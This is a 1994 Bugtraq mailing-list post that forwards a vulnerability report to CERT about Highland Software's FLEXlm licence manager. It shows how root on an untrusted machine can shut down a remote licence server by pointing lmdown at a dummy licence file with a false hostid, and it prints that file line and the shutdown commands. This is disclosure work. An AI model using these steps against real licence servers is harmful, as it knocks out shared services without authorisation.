Home page logo

bugtraq logo Bugtraq mailing list archives

FLEXlm problem
From: rjd4 () ucs cam ac uk (Bob Dowling)
Date: Thu, 24 Feb 1994 21:01:08 +0000

I'm new to this mailing list, so if the format of this report is
incorrect or inappropriate, please don't flame me too much.

This is a copy of a report I sent to the CERT some time ago about
Highland's FLEXlm software.  I've just been told that what I describe
here as a denial of service *attack* is causing serious problems in one
of our departments simply through *accident*.

I've removed the Sun engineer's name from the included message in case
anyone decides to blame the messenger.

 ----- Included: Message to the CERT -----

The following is a description of what I believe to be a serious
vulnerability in the widely used FLEXlm network licensing package
written by Highland Software.  You probably know about it already, but
just in case you don't, here goes...

*** Synopsis:

The root user on an arbitrary network-connected machine with the FLEXlm
software can cause the FLEXlm licence manager daemon on any network-
accessible licence server to shut down using the FLEXlm lmdown command.

*** Scenario:

Two machines: alpha and beta.  Alpha is running the FLEXlm licence
server software.  Alpha does not "trust" beta in any way.  Beta has a
copy of the FLEXlm software too, and in particular has the lmdown
program.  On beta a one line dummy licence data file is created in
/etc/licence.dat pointing at alpha:

SERVER alpha 7260057c 1700

(The hostid "7260057c" is not alpha's; it is deliberately incorrect.)

alpha's licence data file is

SERVER alpha 7260057b 1700
DAEMON suntechd /opt/SUNWspro/bin

# Serial No FX2811-162-13
# 1 user license for SPARCompiler_C 2.0FCS, Expires: Never
FEATURE sunpro.c suntechd 2.000 1-jan-0 1 EBA8B0F1534F569284CD ""

# Serial No FX6696-16201-10
# 1 user license for SPARCompiler_Fortran 2.01FCS, Expires: Never
FEATURE sunpro.f77 suntechd 2.010 1-jan-0 1 8B7850316C56E1F2467B ""

# Serial No FX3928-16301-4
# 1 user license for SPARCompiler_C++ 3.01FCS, Expires: Never
FEATURE sunpro.cc suntechd 3.010 1-jan-0 1 BBA86001599F95AC7CE7 ""

# Serial No FX11-4036301-7 - using FX6-4026301-7 FX1667-16301-7
# 3 user license for SPARCompiler_Pascal 3.01FCS, Expires: Never
FEATURE sunpro.pc suntechd 3.010 1-jan-0 3 8BD84051269969C54B14 ""

# Serial No FX128-162-1
# 1 user license for SPARCworks 2.0FCS, Expires: Never
FEATURE sunpro.sparcworks.tools suntechd 2.000 1-jan-0 1 3B38D011304C4D636ADA ""

On beta I give the following instructions as root:

# lmdown -c /etc/licence.dat
lmdown - Copyright (C) 1989, 1991 Highland Software, Inc.

Shutting down FLEXlm on nodes: alpha
Are you sure? [y/n]: y
Shut down node alpha

and alpha's licence serving is indeed shut down.

*** Action so far:

I reported this as a bug to Sun, who supplied us with the FLEXlm
software as part of their compiler kit.  (Though I don't regard it as a
Sun-specific problem; I think this is a function purely of the FLEXlm
software.)  I enclose their response:

----- Included message: -----

  By Date           By Thread  

Current thread:
  • FLEXlm problem Bob Dowling (Feb 24)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]